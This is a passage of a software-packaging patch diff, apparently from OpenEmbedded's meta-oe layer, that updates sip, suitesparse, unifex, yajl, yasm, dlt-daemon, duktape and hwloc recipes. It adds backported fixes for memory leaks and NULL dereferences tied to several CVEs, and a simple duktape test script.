TK_OPERATOR = 374, +- TK_THROW = 375, +- TK_QOBJECT = 376, +- TK_EXCEPTION = 377, +- TK_RAISECODE = 378, +- TK_EXPLICIT = 379, +- TK_TEMPLATE = 380, +- TK_FINAL = 381, +- TK_ELLIPSIS = 382, +- TK_DEFMETATYPE = 383, +- TK_DEFSUPERTYPE = 384, +- TK_PROPERTY = 385, +- TK_HIDE_NS = 386, +- TK_FORMAT = 387, +- TK_GET = 388, +- TK_ID = 389, +- TK_KWARGS = 390, +- TK_LANGUAGE = 391, +- TK_LICENSEE = 392, +- TK_NAME = 393, +- TK_OPTIONAL = 394, +- TK_ORDER = 395, +- TK_REMOVELEADING = 396, +- TK_SET = 397, +- TK_SIGNATURE = 398, +- TK_TIMESTAMP = 399, +- TK_TYPE = 400, +- TK_USEARGNAMES = 401, +- TK_USELIMITEDAPI = 402, +- TK_ALLRAISEPYEXC = 403, +- TK_CALLSUPERINIT = 404, +- TK_DEFERRORHANDLER = 405, +- TK_VERSION = 406 +- }; ++ enum yytokentype ++ { ++ YYEMPTY = -2, ++ YYEOF = 0, /* "end of file" */ ++ YYerror = 256, /* error */ ++ YYUNDEF = 257, /* "invalid token" */ ++ TK_API = 258, /* TK_API */ ++ TK_AUTOPYNAME = 259, /* TK_AUTOPYNAME */ ++ TK_DEFDOCSTRFMT = 260, /* TK_DEFDOCSTRFMT */ ++ TK_DEFDOCSTRSIG = 261, /* TK_DEFDOCSTRSIG */ ++ TK_DEFENCODING = 262, /* TK_DEFENCODING */ ++ TK_PLUGIN = 263, /* TK_PLUGIN */ ++ TK_VIRTERRORHANDLER = 264, /* TK_VIRTERRORHANDLER */ ++ TK_EXPTYPEHINTCODE = 265, /* TK_EXPTYPEHINTCODE */ ++ TK_TYPEHINTCODE = 266, /* TK_TYPEHINTCODE */ ++ TK_DOCSTRING = 267, /* TK_DOCSTRING */ ++ TK_DOC = 268, /* TK_DOC */ ++ TK_EXPORTEDDOC = 269, /* TK_EXPORTEDDOC */ ++ TK_EXTRACT = 270, /* TK_EXTRACT */ ++ TK_MAKEFILE = 271, /* TK_MAKEFILE */ ++ TK_ACCESSCODE = 272, /* TK_ACCESSCODE */ ++ TK_GETCODE = 273, /* TK_GETCODE */ ++ TK_SETCODE = 274, /* TK_SETCODE */ ++ TK_PREINITCODE = 275, /* TK_PREINITCODE */ ++ TK_INITCODE = 276, /* TK_INITCODE */ ++ TK_POSTINITCODE = 277, /* TK_POSTINITCODE */ ++ TK_FINALCODE = 278, /* TK_FINALCODE */ ++ TK_UNITCODE = 279, /* TK_UNITCODE */ ++ TK_UNITPOSTINCLUDECODE = 280, /* TK_UNITPOSTINCLUDECODE */ ++ TK_MODCODE = 281, /* TK_MODCODE */ ++ TK_TYPECODE = 282, /* TK_TYPECODE */ ++ TK_PREPYCODE = 283, /* TK_PREPYCODE */ ++ TK_COPYING = 284, /* TK_COPYING */ ++ TK_MAPPEDTYPE = 285, /* TK_MAPPEDTYPE */ ++ TK_CODELINE = 286, /* TK_CODELINE */ ++ TK_IF = 287, /* TK_IF */ ++ TK_END = 288, /* TK_END */ ++ TK_NAME_VALUE = 289, /* TK_NAME_VALUE */ ++ TK_PATH_VALUE = 290, /* TK_PATH_VALUE */ ++ TK_STRING_VALUE = 291, /* TK_STRING_VALUE */ ++ TK_VIRTUALCATCHERCODE = 292, /* TK_VIRTUALCATCHERCODE */ ++ TK_TRAVERSECODE = 293, /* TK_TRAVERSECODE */ ++ TK_CLEARCODE = 294, /* TK_CLEARCODE */ ++ TK_GETBUFFERCODE = 295, /* TK_GETBUFFERCODE */ ++ TK_RELEASEBUFFERCODE = 296, /* TK_RELEASEBUFFERCODE */ ++ TK_READBUFFERCODE = 297, /* TK_READBUFFERCODE */ ++ TK_WRITEBUFFERCODE = 298, /* TK_WRITEBUFFERCODE */ ++ TK_SEGCOUNTCODE = 299, /* TK_SEGCOUNTCODE */ ++ TK_CHARBUFFERCODE = 300, /* TK_CHARBUFFERCODE */ ++ TK_PICKLECODE = 301, /* TK_PICKLECODE */ ++ TK_VIRTUALCALLCODE = 302, /* TK_VIRTUALCALLCODE */ ++ TK_METHODCODE = 303, /* TK_METHODCODE */ ++ TK_PREMETHODCODE = 304, /* TK_PREMETHODCODE */ ++ TK_INSTANCECODE = 305, /* TK_INSTANCECODE */ ++ TK_FROMTYPE = 306, /* TK_FROMTYPE */ ++ TK_TOTYPE = 307, /* TK_TOTYPE */ ++ TK_TOSUBCLASS = 308, /* TK_TOSUBCLASS */ ++ TK_INCLUDE = 309, /* TK_INCLUDE */ ++ TK_OPTINCLUDE = 310, /* TK_OPTINCLUDE */ ++ TK_IMPORT = 311, /* TK_IMPORT */ ++ TK_EXPHEADERCODE = 312, /* TK_EXPHEADERCODE */ ++ TK_MODHEADERCODE = 313, /* TK_MODHEADERCODE */ ++ TK_TYPEHEADERCODE = 314, /* TK_TYPEHEADERCODE */ ++ TK_MODULE = 315, /* TK_MODULE */ ++ TK_CMODULE = 316, /* TK_CMODULE */ ++ TK_CONSMODULE = 317, /* TK_CONSMODULE */ ++ TK_COMPOMODULE = 318, /* TK_COMPOMODULE */ ++ TK_CLASS = 319, /* TK_CLASS */ ++ TK_STRUCT = 320, /* TK_STRUCT */ ++ TK_PUBLIC = 321, /* TK_PUBLIC */ ++ TK_PROTECTED = 322, /* TK_PROTECTED */ ++ TK_PRIVATE = 323, /* TK_PRIVATE */ ++ TK_SIGNALS = 324, /* TK_SIGNALS */ ++ TK_SIGNAL_METHOD = 325, /* TK_SIGNAL_METHOD */ ++ TK_SLOTS = 326, /* TK_SLOTS */ ++ TK_SLOT_METHOD = 327, /* TK_SLOT_METHOD */ ++ TK_BOOL = 328, /* TK_BOOL */ ++ TK_SHORT = 329, /* TK_SHORT */ ++ TK_INT = 330, /* TK_INT */ ++ TK_LONG = 331, /* TK_LONG */ ++ TK_FLOAT = 332, /* TK_FLOAT */ ++ TK_DOUBLE = 333, /* TK_DOUBLE */ ++ TK_CHAR = 334, /* TK_CHAR */ ++ TK_WCHAR_T = 335, /* TK_WCHAR_T */ ++ TK_VOID = 336, /* TK_VOID */ ++ TK_PYOBJECT = 337, /* TK_PYOBJECT */ ++ TK_PYTUPLE = 338, /* TK_PYTUPLE */ ++ TK_PYLIST = 339, /* TK_PYLIST */ ++ TK_PYDICT = 340, /* TK_PYDICT */ ++ TK_PYCALLABLE = 341, /* TK_PYCALLABLE */ ++ TK_PYSLICE = 342, /* TK_PYSLICE */ ++ TK_PYTYPE = 343, /* TK_PYTYPE */ ++ TK_PYBUFFER = 344, /* TK_PYBUFFER */ ++ TK_VIRTUAL = 345, /* TK_VIRTUAL */ ++ TK_ENUM = 346, /* TK_ENUM */ ++ TK_SIGNED = 347, /* TK_SIGNED */ ++ TK_UNSIGNED = 348, /* TK_UNSIGNED */ ++ TK_SCOPE = 349, /* TK_SCOPE */ ++ TK_LOGICAL_OR = 350, /* TK_LOGICAL_OR */ ++ TK_CONST = 351, /* TK_CONST */ ++ TK_STATIC = 352, /* TK_STATIC */ ++ TK_SIPSIGNAL = 353, /* TK_SIPSIGNAL */ ++ TK_SIPSLOT = 354, /* TK_SIPSLOT */ ++ TK_SIPANYSLOT = 355, /* TK_SIPANYSLOT */ ++ TK_SIPRXCON = 356, /* TK_SIPRXCON */ ++ TK_SIPRXDIS = 357, /* TK_SIPRXDIS */ ++ TK_SIPSLOTCON = 358, /* TK_SIPSLOTCON */ ++ TK_SIPSLOTDIS = 359, /* TK_SIPSLOTDIS */ ++ TK_SIPSSIZET = 360, /* TK_SIPSSIZET */ ++ TK_SIZET = 361, /* TK_SIZET */ ++ TK_NUMBER_VALUE = 362, /* TK_NUMBER_VALUE */ ++ TK_REAL_VALUE = 363, /* TK_REAL_VALUE */ ++ TK_TYPEDEF = 364, /* TK_TYPEDEF */ ++ TK_NAMESPACE = 365, /* TK_NAMESPACE */ ++ TK_TIMELINE = 366, /* TK_TIMELINE */ ++ TK_PLATFORMS = 367, /* TK_PLATFORMS */ ++ TK_FEATURE = 368, /* TK_FEATURE */ ++ TK_LICENSE = 369, /* TK_LICENSE */ ++ TK_QCHAR_VALUE = 370, /* TK_QCHAR_VALUE */ ++ TK_TRUE_VALUE = 371, /* TK_TRUE_VALUE */ ++ TK_FALSE_VALUE = 372, /* TK_FALSE_VALUE */ ++ TK_NULL_VALUE = 373, /* TK_NULL_VALUE */ ++ TK_OPERATOR = 374, /* TK_OPERATOR */ ++ TK_THROW = 375, /* TK_THROW */ ++ TK_QOBJECT = 376, /* TK_QOBJECT */ ++ TK_EXCEPTION = 377, /* TK_EXCEPTION */ ++ TK_RAISECODE = 378, /* TK_RAISECODE */ ++ TK_EXPLICIT = 379, /* TK_EXPLICIT */ ++ TK_TEMPLATE = 380, /* TK_TEMPLATE */ ++ TK_FINAL = 381, /* TK_FINAL */ ++ TK_ELLIPSIS = 382, /* TK_ELLIPSIS */ ++ TK_DEFMETATYPE = 383, /* TK_DEFMETATYPE */ ++ TK_DEFSUPERTYPE = 384, /* TK_DEFSUPERTYPE */ ++ TK_PROPERTY = 385, /* TK_PROPERTY */ ++ TK_HIDE_NS = 386, /* TK_HIDE_NS */ ++ TK_FORMAT = 387, /* TK_FORMAT */ ++ TK_GET = 388, /* TK_GET */ ++ TK_ID = 389, /* TK_ID */ ++ TK_KWARGS = 390, /* TK_KWARGS */ ++ TK_LANGUAGE = 391, /* TK_LANGUAGE */ ++ TK_LICENSEE = 392, /* TK_LICENSEE */ ++ TK_NAME = 393, /* TK_NAME */ ++ TK_OPTIONAL = 394, /* TK_OPTIONAL */ ++ TK_ORDER = 395, /* TK_ORDER */ ++ TK_REMOVELEADING = 396, /* TK_REMOVELEADING */ ++ TK_SET = 397, /* TK_SET */ ++ TK_SIGNATURE = 398, /* TK_SIGNATURE */ ++ TK_TIMESTAMP = 399, /* TK_TIMESTAMP */ ++ TK_TYPE = 400, /* TK_TYPE */ ++ TK_USEARGNAMES = 401, /* TK_USEARGNAMES */ ++ TK_PYSSIZETCLEAN = 402, /* TK_PYSSIZETCLEAN */ ++ TK_USELIMITEDAPI = 403, /* TK_USELIMITEDAPI */ ++ TK_ALLRAISEPYEXC = 404, /* TK_ALLRAISEPYEXC */ ++ TK_CALLSUPERINIT = 405, /* TK_CALLSUPERINIT */ ++ TK_DEFERRORHANDLER = 406, /* TK_DEFERRORHANDLER */ ++ TK_VERSION = 407 /* TK_VERSION */ ++ }; ++ typedef enum yytokentype yytoken_kind_t; + #endif +-/* Tokens. */ ++/* Token kinds. */ ++#define YYEMPTY -2 ++#define YYEOF 0 ++#define YYerror 256 ++#define YYUNDEF 257 + #define TK_API 258 + #define TK_AUTOPYNAME 259 + #define TK_DEFDOCSTRFMT 260 +@@ -335,19 +356,19 @@ + #define TK_TIMESTAMP 399 + #define TK_TYPE 400 + #define TK_USEARGNAMES 401 +-#define TK_USELIMITEDAPI 402 +-#define TK_ALLRAISEPYEXC 403 +-#define TK_CALLSUPERINIT 404 +-#define TK_DEFERRORHANDLER 405 +-#define TK_VERSION 406 +- +- +- ++#define TK_PYSSIZETCLEAN 402 ++#define TK_USELIMITEDAPI 403 ++#define TK_ALLRAISEPYEXC 404 ++#define TK_CALLSUPERINIT 405 ++#define TK_DEFERRORHANDLER 406 ++#define TK_VERSION 407 + ++/* Value type. */ + #if ! defined YYSTYPE && ! defined YYSTYPE_IS_DECLARED +-typedef union YYSTYPE +-#line 202 "sip-4.19.23/sipgen/metasrc/parser.y" ++union YYSTYPE + { ++#line 202 "parser.y" ++ + char qchar; + char *text; + long number; +@@ -390,14 +411,20 @@ typedef union YYSTYPE + variableCfg variable; + vehCfg veh; + int token; +-} +-/* Line 1529 of yacc.c. */ +-#line 396 "sip-4.19.23/sipgen/parser.h" +- YYSTYPE; +-# define yystype YYSTYPE /* obsolescent; will be withdrawn */ +-# define YYSTYPE_IS_DECLARED 1 ++ ++#line 416 "../parser.h" ++ ++}; ++typedef union YYSTYPE YYSTYPE; + # define YYSTYPE_IS_TRIVIAL 1 ++# define YYSTYPE_IS_DECLARED 1 + #endif + ++ + extern YYSTYPE yylval; + ++ ++int yyparse (void); ++ ++ ++#endif /* !YY_YY_PARSER_H_INCLUDED */ diff --git a/meta-oe/recipes-devtools/sip/sip3_4.19.23.bb b/meta-oe/recipes-devtools/sip/sip3_4.19.23.bb index d6335585e2..dc3db1fcd4 100644 --- a/meta-oe/recipes-devtools/sip/sip3_4.19.23.bb +++ b/meta-oe/recipes-devtools/sip/sip3_4.19.23.bb @@ -5,7 +5,9 @@ LICENSE = "GPL-2.0-or-later" LIC_FILES_CHKSUM = "file://LICENSE-GPL2;md5=e91355d8a6f8bd8f7c699d62863c7303" SRC_URI = "https://www.riverbankcomputing.com/static/Downloads/sip/${PV}/sip-${PV}.tar.gz \ + file://added-the-py_ssize_t_clean-argument-to-the-module-directive.patch \ " + SRC_URI[md5sum] = "70adc0c9734e2d9dcd241d3f931dfc74" SRC_URI[sha256sum] = "22ca9bcec5388114e40d4aafd7ccd0c4fe072297b628d0c5cdfa2f010c0bc7e7" @@ -29,11 +31,28 @@ do_configure:prepend() { echo "sip_inc_dir = ${D}/${includedir}" >> sip.cfg echo "sip_module_dir = ${D}/${libdir}/python%(py_major).%(py_minor)/site-packages" >> sip.cfg echo "sip_sip_dir = ${D}/${datadir}/sip" >> sip.cfg - ${PYTHON} configure.py --configuration sip.cfg --sip-module PyQt5.sip --sysroot ${CONFIGURE_SYSROOT} CC="${CC}" CXX="${CXX}" LINK="${CXX}" STRIP="" LINK_SHLIB="${CXX}" CFLAGS="${CFLAGS}" CXXFLAGS="${CXXFLAGS}" LFLAGS="${LDFLAGS}" + ${PYTHON} configure.py --configuration sip.cfg --destdir /${D}${libdir}/${PYTHON_DIR}/site-packages/ --sip-module PyQt5.sip --sysroot ${CONFIGURE_SYSROOT} CC="${CC}" CXX="${CXX}" LINK="${CXX}" STRIP="" LINK_SHLIB="${CXX}" CFLAGS="${CFLAGS}" CXXFLAGS="${CXXFLAGS}" LFLAGS="${LDFLAGS}" } do_install() { oe_runmake install + + sed -i \ + -e "s@[^ ]*-fdebug-prefix-map=[^ ']*@@g" \ + -e "s@[^ ]*-fmacro-prefix-map=[^ ']*@@g" \ + -e "s@[^ ]*-ffile-prefix-map=[^ ']*@@g" \ + ${D}${libdir}/${PYTHON_DIR}/site-packages/sipconfig.py + + # Remove the destination directory + sed -i -e "s@${D}/@@g" ${D}${libdir}/${PYTHON_DIR}/site-packages/sipconfig.py + + if [ -n "${STAGING_DIR_NATIVE}" ]; then + sed -i -e "s@${STAGING_DIR_NATIVE}@@g" ${D}${libdir}/${PYTHON_DIR}/site-packages/sipconfig.py + fi + + if [ -n "${STAGING_DIR_TARGET}" ]; then + sed -i -e "s@${STAGING_DIR_TARGET}@@g" ${D}${libdir}/${PYTHON_DIR}/site-packages/sipconfig.py + fi } FILES:python3-sip3 = "${libdir}/${PYTHON_DIR}/site-packages/" diff --git a/meta-oe/recipes-devtools/suitesparse/suitesparse_5.10.1.bb b/meta-oe/recipes-devtools/suitesparse/suitesparse_5.10.1.bb index 38e34b93c6..56cbfce20e 100644 --- a/meta-oe/recipes-devtools/suitesparse/suitesparse_5.10.1.bb +++ b/meta-oe/recipes-devtools/suitesparse/suitesparse_5.10.1.bb @@ -1,6 +1,6 @@ LICENSE = "GPL-2.0-only & GPL-3.0-only & BSD-3-Clause & LGPL-2.0-only & Apache-2.0" LIC_FILES_CHKSUM = "file://LICENSE.txt;md5=5fa987762101f748a6cdd951b64ffc6b" -SRC_URI = "git://github.com/DrTimothyAldenDavis/SuiteSparse;protocol=https;branch=master \ +SRC_URI = "git://github.com/DrTimothyAldenDavis/SuiteSparse;protocol=https;branch=stable \ file://0001-Preserve-CXXFLAGS-from-environment-in-Mongoose.patch \ file://0002-Preserve-links-when-installing-libmetis.patch \ file://0003-Add-version-information-to-libmetis.patch \ diff --git a/meta-oe/recipes-devtools/unifex/unifex_git.bb b/meta-oe/recipes-devtools/unifex/unifex_git.bb index 85fe39b6de..f55d7e32c8 100644 --- a/meta-oe/recipes-devtools/unifex/unifex_git.bb +++ b/meta-oe/recipes-devtools/unifex/unifex_git.bb @@ -20,5 +20,3 @@ EXTRA_OECMAKE += " \ -DCMAKE_CXX_STANDARD=20 \ -DUNIFEX_BUILD_EXAMPLES=OFF \ " - -BBCLASSEXTEND = "native nativesdk" diff --git a/meta-oe/recipes-devtools/yajl/yajl/CVE-2023-33460.patch b/meta-oe/recipes-devtools/yajl/yajl/CVE-2023-33460.patch new file mode 100644 index 0000000000..169784d427 --- /dev/null +++ b/meta-oe/recipes-devtools/yajl/yajl/CVE-2023-33460.patch @@ -0,0 +1,29 @@ +From 23a122eddaa28165a6c219000adcc31ff9a8a698 Mon Sep 17 00:00:00 2001 +From: "zhang.jiujiu" <282627424@qq.com> +Date: Tue, 7 Dec 2021 22:37:02 +0800 +Subject: [PATCH] fix memory leaks + +Upstream-Status: Backport [https://github.com/openEuler-BaseService/yajl/commit/23a122eddaa28165a6c219000adcc31ff9a8a698] +CVE: CVE-2023-33460 +Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com> +--- + src/yajl_tree.c | 3 +++ + 1 file changed, 3 insertions(+) + +diff --git a/src/yajl_tree.c b/src/yajl_tree.c +index 3d357a3..a71167e 100644 +--- a/src/yajl_tree.c ++++ b/src/yajl_tree.c +@@ -445,6 +445,9 @@ yajl_val yajl_tree_parse (const char *input, + YA_FREE(&(handle->alloc), internal_err_str); + } + yajl_free (handle); ++ //If the requested memory is not released in time, it will cause memory leakage ++ if(ctx.root) ++ yajl_tree_free(ctx.root); + return NULL; + } + +-- +2.25.1 + diff --git a/meta-oe/recipes-devtools/yajl/yajl_2.1.0.bb b/meta-oe/recipes-devtools/yajl/yajl_2.1.0.bb index cf8dbb183e..697f54d9fb 100644 --- a/meta-oe/recipes-devtools/yajl/yajl_2.1.0.bb +++ b/meta-oe/recipes-devtools/yajl/yajl_2.1.0.bb @@ -8,7 +8,9 @@ HOMEPAGE = "http://lloyd.github.com/yajl/" LICENSE = "ISC" LIC_FILES_CHKSUM = "file://COPYING;md5=39af6eb42999852bdd3ea00ad120a36d" -SRC_URI = "git://github.com/lloyd/yajl;branch=master;protocol=https" +SRC_URI = "git://github.com/lloyd/yajl;branch=master;protocol=https \ + file://CVE-2023-33460.patch \ + " SRCREV = "a0ecdde0c042b9256170f2f8890dd9451a4240aa" S = "${WORKDIR}/git" diff --git a/meta-oe/recipes-devtools/yasm/yasm/CVE-2023-31975.patch b/meta-oe/recipes-devtools/yasm/yasm/CVE-2023-31975.patch new file mode 100644 index 0000000000..ae10e99c2f --- /dev/null +++ b/meta-oe/recipes-devtools/yasm/yasm/CVE-2023-31975.patch @@ -0,0 +1,29 @@ +From b2cc5a1693b17ac415df76d0795b15994c106441 Mon Sep 17 00:00:00 2001 +From: Katsuhiko Gondow <gondow@cs.titech.ac.jp> +Date: Tue, 13 Jun 2023 05:00:47 +0900 +Subject: [PATCH] Fix memory leak in bin-objfmt (#231) + +Upstream-Status: Backport [https://github.com/yasm/yasm/commit/b2cc5a1693b17ac415df76d0795b15994c106441] + +CVE: CVE-2023-31975 +--- + modules/objfmts/bin/bin-objfmt.c | 4 ++++ + 1 file changed, 4 insertions(+) + +diff --git a/modules/objfmts/bin/bin-objfmt.c b/modules/objfmts/bin/bin-objfmt.c +index 18026750..a38c3422 100644 +--- a/modules/objfmts/bin/bin-objfmt.c ++++ b/modules/objfmts/bin/bin-objfmt.c +@@ -1680,6 +1680,10 @@ static void + bin_section_data_destroy(void *data) + { + bin_section_data *bsd = (bin_section_data *)data; ++ if (bsd->align) ++ yasm_xfree(bsd->align); ++ if (bsd->valign) ++ yasm_xfree(bsd->valign); + if (bsd->start) + yasm_expr_destroy(bsd->start); + if (bsd->vstart) +-- +2.40.0 diff --git a/meta-oe/recipes-devtools/yasm/yasm/CVE-2023-37732.patch b/meta-oe/recipes-devtools/yasm/yasm/CVE-2023-37732.patch new file mode 100644 index 0000000000..1ca33f0a92 --- /dev/null +++ b/meta-oe/recipes-devtools/yasm/yasm/CVE-2023-37732.patch @@ -0,0 +1,41 @@ +From 2cd3bb50e256f5ed5f611ac611d25fe673f2cec3 Mon Sep 17 00:00:00 2001 +From: Peter Johnson <johnson.peter@gmail.com> +Date: Fri, 11 Aug 2023 10:49:51 +0000 +Subject: [PATCH] elf.c: Fix NULL deref on bad xsize expression (#234) + +CVE: CVE-2023-37732 + +Upstream-Status: Backport [https://github.com/yasm/yasm/commit/2cd3bb50e256f5ed5f611ac611d25fe673f2cec3] + +Signed-off-by: Soumya <soumya.sambu@windriver.com> +--- + modules/objfmts/elf/elf.c | 10 +++++----- + 1 file changed, 5 insertions(+), 5 deletions(-) + +diff --git a/modules/objfmts/elf/elf.c b/modules/objfmts/elf/elf.c +index 2486bba8..bab4c9ca 100644 +--- a/modules/objfmts/elf/elf.c ++++ b/modules/objfmts/elf/elf.c +@@ -482,15 +482,15 @@ elf_symtab_write_to_file(FILE *f, elf_symtab_head *symtab, + + /* get size (if specified); expr overrides stored integer */ + if (entry->xsize) { +- size_intn = yasm_intnum_copy( +- yasm_expr_get_intnum(&entry->xsize, 1)); +- if (!size_intn) { ++ yasm_intnum *intn = yasm_expr_get_intnum(&entry->xsize, 1); ++ if (!intn) { + yasm_error_set(YASM_ERROR_VALUE, + N_("size specifier not an integer expression")); + yasm_errwarn_propagate(errwarns, entry->xsize->line); +- } ++ } else ++ size_intn = yasm_intnum_copy(intn); + } +- else ++ if (!size_intn) + size_intn = yasm_intnum_create_uint(entry->size); + + /* get EQU value for constants */ +-- +2.40.0 diff --git a/meta-oe/recipes-devtools/yasm/yasm_git.bb b/meta-oe/recipes-devtools/yasm/yasm_git.bb index 044fcbea74..60b00f7ff4 100644 --- a/meta-oe/recipes-devtools/yasm/yasm_git.bb +++ b/meta-oe/recipes-devtools/yasm/yasm_git.bb @@ -11,6 +11,8 @@ PV = "1.3.0+git${SRCPV}" SRCREV = "ba463d3c26c0ece2e797b8d6381b161633b5971a" SRC_URI = "git://github.com/yasm/yasm.git;branch=master;protocol=https \ file://0001-Do-not-use-AC_HEADER_STDC.patch \ + file://CVE-2023-31975.patch \ + file://CVE-2023-37732.patch \ " S = "${WORKDIR}/git" diff --git a/meta-oe/recipes-extended/dlt-daemon/dlt-daemon/0001-Fix-memory-leak.patch b/meta-oe/recipes-extended/dlt-daemon/dlt-daemon/0001-Fix-memory-leak.patch new file mode 100644 index 0000000000..72e3b9802d --- /dev/null +++ b/meta-oe/recipes-extended/dlt-daemon/dlt-daemon/0001-Fix-memory-leak.patch @@ -0,0 +1,34 @@ +From b6149e203f919c899fefc702a17fbb78bdec3700 Mon Sep 17 00:00:00 2001 +From: Le Van Khanh <Khanh.LeVan@vn.bosch.com> +Date: Thu, 9 Feb 2023 03:17:13 -0500 +Subject: [PATCH] Fix memory leak + +Free the ecuid_conf in case of memory alllocated + +CVE: CVE-2023-26257 + +Upstream-Status: Backport +[https://github.com/COVESA/dlt-daemon/pull/441/commits/b6149e203f919c899fefc702a17fbb78bdec3700] + +Signed-off-by: Le Van Khanh <Khanh.LeVan@vn.bosch.com> + +Signed-off-by: Yogita Urade <yogita.urade@windriver.com> +--- + src/console/dlt-control-common.c | 2 ++ + 1 file changed, 2 insertions(+) + +diff --git a/src/console/dlt-control-common.c b/src/console/dlt-control-common.c +index abcaf92..64951c1 100644 +--- a/src/console/dlt-control-common.c ++++ b/src/console/dlt-control-common.c +@@ -124,6 +124,8 @@ void set_ecuid(char *ecuid) + if (dlt_parse_config_param("ECUId", &ecuid_conf) == 0) { + memset(local_ecuid, 0, DLT_CTRL_ECUID_LEN); + strncpy(local_ecuid, ecuid_conf, DLT_CTRL_ECUID_LEN); ++ if (ecuid_conf !=NULL) ++ free(ecuid_conf); + local_ecuid[DLT_CTRL_ECUID_LEN - 1] = '\0'; + } + else { +-- +2.34.1 diff --git a/meta-oe/recipes-extended/dlt-daemon/dlt-daemon_2.18.8.bb b/meta-oe/recipes-extended/dlt-daemon/dlt-daemon_2.18.8.bb index 7a613bcc93..b98cfadf3e 100644 --- a/meta-oe/recipes-extended/dlt-daemon/dlt-daemon_2.18.8.bb +++ b/meta-oe/recipes-extended/dlt-daemon/dlt-daemon_2.18.8.bb @@ -18,6 +18,7 @@ SRC_URI = "git://github.com/GENIVI/${BPN}.git;protocol=https;branch=master \ file://0002-Don-t-execute-processes-as-a-specific-user.patch \ file://0004-Modify-systemd-config-directory.patch \ file://0001-cmake-Link-with-libatomic-on-rv32-rv64.patch \ + file://0001-Fix-memory-leak.patch \ " SRCREV = "6a3bd901d825c7206797e36ea98e10a218f5aad2" diff --git a/meta-oe/recipes-extended/duktape/duktape_2.7.0.bb b/meta-oe/recipes-extended/duktape/duktape_2.7.0.bb index 7674785437..583e8337e7 100644 --- a/meta-oe/recipes-extended/duktape/duktape_2.7.0.bb +++ b/meta-oe/recipes-extended/duktape/duktape_2.7.0.bb @@ -4,7 +4,11 @@ HOMEPAGE = "https://duktape.org" LICENSE = "MIT" LIC_FILES_CHKSUM = "file://LICENSE.txt;md5=3b7825df97b52f926fc71300f7880408" -SRC_URI = "https://duktape.org/duktape-${PV}.tar.xz" +SRC_URI = "https://duktape.org/duktape-${PV}.tar.xz \ + file://run-ptest \ + " +inherit ptest + SRC_URI[sha256sum] = "90f8d2fa8b5567c6899830ddef2c03f3c27960b11aca222fa17aa7ac613c2890" EXTRA_OEMAKE = "INSTALL_PREFIX='${prefix}' DESTDIR='${D}' LIBDIR='/${baselib}'" @@ -13,8 +17,24 @@ do_compile () { oe_runmake -f Makefile.sharedlibrary INSTALL_PREFIX="${prefix}" DESTDIR="${D}" } +do_compile_ptest() { + oe_runmake -f Makefile.hello INSTALL_PREFIX="${prefix}" DESTDIR="${D}" + oe_runmake -f Makefile.eval INSTALL_PREFIX="${prefix}" DESTDIR="${D}" + oe_runmake -f Makefile.eventloop INSTALL_PREFIX="${prefix}" DESTDIR="${D}" +} + do_install () { oe_runmake -f Makefile.sharedlibrary INSTALL_PREFIX="${prefix}" DESTDIR="${D}" install # libduktaped is identical to libduktape but has an hard-coded -g build flags, remove it rm -f ${D}${libdir}/libduktaped.so* } + +do_install_ptest() { + install -m 0755 "${WORKDIR}/duktape-2.7.0/hello" "${D}${PTEST_PATH}" + install -m 0755 "${WORKDIR}/duktape-2.7.0/eval" "${D}${PTEST_PATH}" + install -m 0755 "${WORKDIR}/duktape-2.7.0/evloop" "${D}${PTEST_PATH}" + install -m 0755 "${WORKDIR}/duktape-2.7.0/examples/eventloop/timer-test.js" "${D}${PTEST_PATH}" + install -m 0755 "${WORKDIR}/duktape-2.7.0/examples/eventloop/ecma_eventloop.js" "${D}${PTEST_PATH}" +} + +RDEPENDS_${PN}-ptest += "make" diff --git a/meta-oe/recipes-extended/duktape/files/run-ptest b/meta-oe/recipes-extended/duktape/files/run-ptest new file mode 100644 index 0000000000..852fb15de4 --- /dev/null +++ b/meta-oe/recipes-extended/duktape/files/run-ptest @@ -0,0 +1,32 @@ +#!/bin/sh + +./hello &> $test.output 2>&1 +out="Hello world!" + +if grep -i "$out" $test.output 2>&1 ; then + echo "PASS: Hello duktape" +else + echo "FAIL: Hello duktape" +fi +rm -f $test.output + +./eval "print('Hello world!'); 123;" > out.log + +sed -n '2p' out.log > eval.log +sed -n '3p' out.log >> eval.log + +if grep -w 'Hello world!\|123' eval.log 2>&1; then + echo "PASS: eval duktape" +else + echo "FAIL: eval duktape" +fi +rm -f eval.log out.log + +./evloop timer-test.js > evloop.log 2>&1 + +if grep -i "no active timers and no sockets to poll" evloop.log 2>&1; then + echo "PASS: evloop duktape" +else + echo "FAIL: evloop duktape" +fi +rm -f evloop.log diff --git a/meta-oe/recipes-extended/hwloc/files/CVE-2022-47022.patch b/meta-oe/recipes-extended/hwloc/files/CVE-2022-47022.patch new file mode 100644 index 0000000000..bfeb9b405d --- /dev/null +++ b/meta-oe/recipes-extended/hwloc/files/CVE-2022-47022.patch @@ -0,0 +1,77 @@ +From ac1f8db9a0790d2bf153711ff4cbf6101f89aace Mon Sep 17 00:00:00 2001 +From: Brice Goglin <Brice.Goglin@inria.fr> +Date: Wed, 23 Aug 2023 19:52:47 +0200 +Subject: [PATCH] linux: handle glibc cpuset allocation failures + +Closes #544 +CVE-2022-47022 + +Signed-off-by: Brice Goglin <Brice.Goglin@inria.fr> + +CVE: CVE-2022-47022 + +Upstream-Status: Backport [https://github.com/open-mpi/hwloc/commit/ac1f8db9a0790d2bf153711ff4cbf6101f89aace] + +Signed-off-by: Soumya Sambu <soumya.sambu@windriver.com> +--- + src/topology-linux.c | 15 ++++++++++++++- + 1 file changed, 14 insertions(+), 1 deletion(-) + +diff --git a/src/topology-linux.c b/src/topology-linux.c +index 62c3b44..86be150 100644 +--- a/src/topology-linux.c ++++ b/src/topology-linux.c +@@ -623,6 +623,8 @@ hwloc_linux_set_tid_cpubind(hwloc_topology_t topology __hwloc_attribute_unused, + + setsize = CPU_ALLOC_SIZE(last+1); + plinux_set = CPU_ALLOC(last+1); ++ if (!plinux_set) ++ return -1; + + CPU_ZERO_S(setsize, plinux_set); + hwloc_bitmap_foreach_begin(cpu, hwloc_set) +@@ -703,7 +705,10 @@ hwloc_linux_find_kernel_nr_cpus(hwloc_topology_t topology) + while (1) { + cpu_set_t *set = CPU_ALLOC(nr_cpus); + size_t setsize = CPU_ALLOC_SIZE(nr_cpus); +- int err = sched_getaffinity(0, setsize, set); /* always works, unless setsize is too small */ ++ int err; ++ if (!set) ++ return -1; /* caller will return an error, and we'll try again later */ ++ err = sched_getaffinity(0, setsize, set); /* always works, unless setsize is too small */ + CPU_FREE(set); + 